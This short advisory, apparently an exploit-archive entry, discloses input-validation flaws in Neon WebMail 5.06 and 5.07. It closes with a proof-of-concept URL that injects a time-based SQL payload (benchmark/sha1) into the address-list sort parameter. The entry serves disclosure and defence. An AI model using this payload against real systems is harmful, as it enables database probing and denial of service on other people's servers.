source: https://www.securityfocus.com/bid/20109/info Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include: - an arbitrary-file-upload vulnerability - an arbitrary-email-manipulation vulnerability - multiple SQL-injection vulnerabilities - an unauthorized-access vulnerability - multiple directory-traversal vulnerabilities - an HTML-injection vulnerability. An attacker can exploit these issues to compromise the affected application. Versions 5.06 and 5.07 (build.200607050) are vulnerable to these issue; prior versions may also be affected. http://www.example.com/neonwebmail/addrlist?PAGE=1&sysid=0&adr_sortkey=rand(benchmark(1000000000000, sha1('123456781234567812345678')))&adr_sortkey_desc= ID, SELECT * FROM T_ADDR_BOOK WHERE ID = 'username' ORDER BYrand(benchmark(1000000000000,sha1('123456781234567812345678'))),SYSID DESC